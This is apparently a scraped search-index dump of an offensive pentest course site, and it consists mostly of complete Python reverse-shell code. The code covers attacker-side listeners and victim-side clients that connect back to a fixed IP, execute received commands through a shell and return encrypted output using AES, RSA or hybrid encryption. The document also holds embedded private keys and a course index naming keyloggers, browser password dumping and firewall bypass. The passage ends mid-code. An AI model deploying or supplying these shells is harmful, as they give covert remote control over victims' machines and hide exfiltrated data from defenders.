import socket\n\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\n\nIV = b\"H\" * 16 # this must match the block size, which is 16 bytes\nkey = b\"H\" * 32 # 32 bytes for AES-256\n\ndef encrypt(message):\n    encryptor = AES.new(key, AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16) # pad() adds the extra bytes needed so the padded message length is a multiple of 16, because CBC mode encrypts 16-byte blocks\n    encrypted_message = encryptor.encrypt(padded_message)\n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(key, AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message, 16)\n    return decrypted_message\n\ndef connect():\n\n    s = socket.socket()\n    s.bind(('192.168.0.152', 8080))\n    s.listen(1)\n    conn, address = s.accept()\n    print('[+] We got a connection')\n    while True:\n\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send(encrypt(b'terminate'))\n            conn.close()\n            break\n        else:\n            command = encrypt(command.encode())\n            conn.send(command)\n            print(decrypt(conn.recv(1024)).decode())\ndef main():\n    connect()\n\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/#test","title":"Test","text":"
                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\n\nkey = b\"H\" * 32 #AES keys may be 128 bits (16 bytes), 192 bits (24 bytes) or 256 bits (32 bytes) long.\nIV = b\"H\" * 16\n\ncipher = AES.new(key, AES.MODE_CBC, IV)\n\nmessage = \"Hello\"\npaddedmessage = Padding.pad(message.encode(), 16)\nencrypted = cipher.encrypt(paddedmessage)\n\nprint (encrypted)\n\n\ndecipher = AES.new(key, AES.MODE_CBC, IV)\npaddeddecrypted = decipher.decrypt(encrypted)\nunpaddedencrypted = Padding.unpad(paddeddecrypted, 16)\n\nprint(unpaddedencrypted.decode())\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/","title":"TCP reverse shell with hybrid encryption AES + RSA","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
  • Tuning the connection attempts.
  • Including cd command into TCP reverse shell.
• Advanced scriptable shells:
  • Using a Dynamic DNS instead of your bare attacker public IP.
  • Making your binary persistent.
  • Making a screenshot.
  • Coding a reverse shell that searches files.
• Techniques for bypassing filters:
  • Coding a reverse shell that scans ports.
  • Hijack the Internet Explorer process to bypass a host-based firewall.
  • Bypassing Next Generation Firewalls.
  • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
  • TCP reverse shell with AES encryption.
  • TCP reverse shell with RSA encryption.
  • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes","rsa"]},{"location":"python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#client-side","title":"Client side","text":"

                                  To be run on the victim's machine.

                                  import subprocess\nimport socket\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\n\nIV = b\"H\" * 16\n\ndef GET_AES(cipher):\n    privatekey = '''-----BEGIN RSA PRIVATE KEY-----\n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\n-----END
 RSA PRIVATE KEY-----'''\n    private_key = RSA.importKey(privatekey)\n    decryptor = PKCS1_OAEP.new(private_key)\n    return decryptor.decrypt(cipher).decode()\n\n\ndef encrypt(message):\n    encryptor = AES.new(AES_KEY, AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16)\n    encrypted_message = encryptor.encrypt(padded_message)\n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(AES_KEY, AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message,\n                                      16)\n    return decrypted_message\n\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    global AES_KEY\n    AES_KEY = s.recv(1024)\n    AES_KEY = GET_AES(AES_KEY)\n    AES_KEY = AES_KEY.encode()\n    print(AES_KEY)\n\n    while True:\n        command = s.recv(1024)\n\n        command = decrypt(command).decode()\n        print (command)\n        if 'terminate' in command:\n            s.close()\n            break\n        else:\n            CMD = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)\n            result = CMD.stdout.read()\n            s.send(encrypt(result))\nconnect()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes","rsa"]},{"location":"python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#server-side","title":"Server side","text":"
                                  import socket\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\nimport string\nimport random\n\nIV = b\"H\" * 16\n\n\nkey = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits + '^!\\$%&/()=?{[]}+~#-_.:,;<>|\\\\') for _ in range(0, 32))\n\n\ndef SEND_AES(message):\n    publickey = '''-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAt9mjsBED9D/MYnU+W5+6\naP9SS1vgL9X6bThNkGKsZ5ZVfnoK4BxMBHI5Gi/YtoCJjyAGsWMpxy1fQ+F+ZWVA\nkwZDoQMWTrfZASHmQgB944PfGA7qfn15kDXmCyvzbitRyWvTs1LDDNF7Q/54Qj82\nh/85ibOPzQrpwQTjEAs8CJ14YWXAJnqOC6devaDYKdB7SSlueVtoQ8BxWc3hOJHJ\npvgZQ/6NixnICLIrFN0YbKZo4A0D3yRJIdumZw8uqwEMeIt41ja6zOG3gKtsG8su\nBZ/MvqX0WgojWr6hNs1Q8h3LtiSsPiUP/bTWD9zos8Yr7RuEabesjHlY0qcNzZ/Y\ngKXdgxUkCikTjRon6Mvh7iWKAtEilQlDeBYMGUvFUQ5FMF5LZJ5Q/7+JXulv8Whq\nKTp4dGpB3kUWuN+ltxBr+IYPhpBfMcR97W+NuXDReUiIGFJpVI1m4AeCzz1BdAM7\nU928DcglK6IowMmN4McyKuv49YYPd7TNFjJWc7P6e19V3BsxA5jpCc6Dxp5AM6WC\n0FqgSSOGVCIkcHT5wLcALyaXOaO0vhMgWWO233Of33wh/7oHclsc5r44MHlZrNSe\nX2QIHCFU4Mwp1hutIuIKkn5dLt1qmt2CDUO/uxGbdTf667c9TLYcYWoi/eDBdrVx\n7CkYI7g81RdcB6jGgbr9W4kCAwEAAQ==\n-----END PUBLIC KEY-----'''\n    public_key = RSA.importKey(publickey)\n    encryptor = PKCS1_OAEP.new(public_key)\n    encryptedData = encryptor.encrypt(message)\n    return encryptedData\n\n\n\n\ndef encrypt(message):\n    encryptor = AES.new(key.encode(), AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16)\n    encrypted_message = encryptor.encrypt(padded_message)\n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(key.encode(), AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message,\n                                      16)\n    return decrypted_message\n\n\ndef connect():\n    s = socket.socket()\n    s.bind(('192.168.0.152', 8080))\n    s.listen(1)\n    print('[+] Listening for incoming TCP connection on port 8080')\n\n    conn, addr = s.accept()\n    print(key.encode())\n    conn.send(SEND_AES(key.encode()))\n\n    while True:\n        store = ''\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        else:\n            command = encrypt(command.encode())\n            conn.send(command)\n            result = conn.recv(1024)\n            try:\n                print(decrypt(result).decode())\n            except:\n                print(\"[-] unable to decrypt/receive data!\")\n\nconnect()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/","title":"TCP reverse shell with RSA encryption","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
  • Tuning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
  • Using a Dynamic DNS instead of your bare attacker public IP.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
  • Hijack the Internet Explorer process to bypass a host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
• Malware and cryptography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
• Password Hijacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.

First, we will generate a pair of keys (private and public) on the client side (victim's machine) and on the server side (attacker's machine).

                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#gen-keys","title":"Gen keys","text":"
# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nfrom Cryptodome.PublicKey import RSA\n\nnew_key = RSA.generate(4096) # generate an RSA key that is 4096 bits long\n\n# Export the key in PEM format; PEM files contain ASCII encoding\npublic_key = new_key.publickey().exportKey(\"PEM\")\nprivate_key = new_key.export_key(\"PEM\")\n\npublic_key_file = open(\"public.pem\", \"wb\")\npublic_key_file.write(public_key)\npublic_key_file.close()\n\nprivate_key_file = open(\"private.pem\", \"wb\")\nprivate_key_file.write(private_key)\nprivate_key_file.close()\n\nprint(public_key.decode())\nprint(private_key.decode())\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-client-side-shell","title":"RSA client side shell","text":"
                                  import subprocess\nimport socket\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.PublicKey import RSA\ndef decrypt(cipher):\n    privatekey = '''-----BEGIN RSA PRIVATE KEY-----\n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\n-----END RSA PRIVATE KEY-----'''\n    private_key = RSA.importKey(privatekey)\n    decryptor = 
PKCS1_OAEP.new(private_key)\n    return decryptor.decrypt(cipher).decode()\n\ndef encrypt(message):\n    publickey = '''-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEApceMHQ9c5Cdf+qgd4ASP\nM7WNbKavEwat78bMHQVK6cRNm2XSWCLpTsYN2eUALV++dYi2Im0T92bqYojRm+p4\nvVKOvrdmcmfnITEw/++pbvGZYRf2y0zsSJi1Mi+lfgQs56QXBMIU6IdeCL2C7cex\n9LNJ98ipGeN6nBiaExI9he3PcivztD5vHowCwkbzAnpZgPamrN10/KukWKvJ3t05\nbc0MskjkhVaaN55eidzAXUmYmxyoLeke1GssiU+TInZQXbSiUeeFsZpkMjYX4nCS\nxT/TuuFaDy6tfpfM+ePNEgeLjn7WAJh2ApxaYhmqwbDTsXd0ldHc4iNeGmlaEGE9\nDgXPSp7ljV9SZ7eO9LZuiERz003NrUqSKSHdYgEIH8wZrCiKSP471oNYn0ye+KdV\n/v25dqTXApO3QO/LZrJQ8twQyASR1LB3tTVYGuNpRVLlNC4j4ivL22uDCbGOIBOa\nKDmu/QR5imLdjj3alVg69Ci3It3jTlubtHDaXTVs+i1133fOKMnRPLmCHE1/6MMS\ni1BzDF46Q2XJwjgDnH5rk70n7sVquQtpHZkpQsuSSrjiL9Bi3jYghReVfFHC7aNF\np42v7EMaLohpnFm6yKiEm5UacMs7rLdnUQtAKo3r5UiNAegY6h/ZDncGhah1e5wF\ndBPIb9wJyTjPYTiTJ3rDQGECAwEAAQ==\n-----END PUBLIC KEY-----'''\n    public_key = RSA.importKey(publickey)\n    encryptor = PKCS1_OAEP.new(public_key)\n    encryptedData = encryptor.encrypt(message)\n    return encryptedData\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = s.recv(1024)\n\n        command = decrypt(command)\n        print (command)\n        if 'terminate' in command:\n            s.close()\n            break\n        else:\n            CMD = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)\n            result = CMD.stdout.read()\n            print (len(result))\n            if len(result) > 470:\n                for i in range(0, len(result), 470):\n                    chunk = result[0+i:470+i]\n                    s.send(encrypt(chunk))\n            else:\n                s.send(encrypt(result))\nconnect()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-enc-big-message","title":"RSA Enc Big Message","text":"
from Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\n\ndef decrypt(cipher):\n    privatekey = open(\"private.pem\", \"rb\")\n    private_key = RSA.importKey(privatekey.read())\n    decryptor = PKCS1_OAEP.new(private_key)\n    print (decryptor.decrypt(cipher).decode())\n\n\ndef encrypt(message):\n    publickey = open(\"public.pem\", \"rb\")\n    public_key = RSA.importKey(publickey.read())\n    encryptor = PKCS1_OAEP.new(public_key)\n    encrypted_data = encryptor.encrypt(message)\n    print(encrypted_data)\n    decrypt(encrypted_data)\n\nmessage = 'H'*500\n\nif len(message) > 470: # The size limitation of a message is 470 bytes when the key size is 4096 bits\n    for i in range(0, len(message), 470): # We split the message into chunks so it can be processed\n        chunk = message[0+i:470+i]\n        encrypt(chunk.encode())\nelse:\n    encrypt(message.encode())\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-enc-small-messages","title":"RSA Enc Small messages","text":"
                                  from Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\n\ndef encrypt(message):\n    publickey = open(\"public.pem\", \"rb\")\n    public_key = RSA.importKey(publickey.read())\n    encryptor = PKCS1_OAEP.new(public_key)\n    encrypted_data = encryptor.encrypt(message)\n    print(encrypted_data)\n    return encrypted_data\n\nmessage = 'H'*470 # Limitation on size of the clear text message is 470 bytes with a key size of 4096 bits\nencrypted_data = encrypt(message.encode())\n\n\ndef decrypt(cipher):\n    privatekey = open(\"private.pem\", \"rb\")\n    private_key = RSA.importKey(privatekey.read())\n    decryptor = PKCS1_OAEP.new(private_key)\n    print (decryptor.decrypt(cipher).decode())\n\ndecrypt(encrypted_data)\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-server-side-shell","title":"RSA Server side shell","text":"
                                  import socket\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\n\ndef encrypt(message):\n    publickey = '''-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAt9mjsBED9D/MYnU+W5+6\naP9SS1vgL9X6bThNkGKsZ5ZVfnoK4BxMBHI5Gi/YtoCJjyAGsWMpxy1fQ+F+ZWVA\nkwZDoQMWTrfZASHmQgB944PfGA7qfn15kDXmCyvzbitRyWvTs1LDDNF7Q/54Qj82\nh/85ibOPzQrpwQTjEAs8CJ14YWXAJnqOC6devaDYKdB7SSlueVtoQ8BxWc3hOJHJ\npvgZQ/6NixnICLIrFN0YbKZo4A0D3yRJIdumZw8uqwEMeIt41ja6zOG3gKtsG8su\nBZ/MvqX0WgojWr6hNs1Q8h3LtiSsPiUP/bTWD9zos8Yr7RuEabesjHlY0qcNzZ/Y\ngKXdgxUkCikTjRon6Mvh7iWKAtEilQlDeBYMGUvFUQ5FMF5LZJ5Q/7+JXulv8Whq\nKTp4dGpB3kUWuN+ltxBr+IYPhpBfMcR97W+NuXDReUiIGFJpVI1m4AeCzz1BdAM7\nU928DcglK6IowMmN4McyKuv49YYPd7TNFjJWc7P6e19V3BsxA5jpCc6Dxp5AM6WC\n0FqgSSOGVCIkcHT5wLcALyaXOaO0vhMgWWO233Of33wh/7oHclsc5r44MHlZrNSe\nX2QIHCFU4Mwp1hutIuIKkn5dLt1qmt2CDUO/uxGbdTf667c9TLYcYWoi/eDBdrVx\n7CkYI7g81RdcB6jGgbr9W4kCAwEAAQ==\n-----END PUBLIC KEY-----'''\n    public_key = RSA.importKey(publickey)\n    encryptor = PKCS1_OAEP.new(public_key)\n    encryptedData = encryptor.encrypt(message)\n    return encryptedData\n\ndef decrypt(cipher):\n    privatekey = 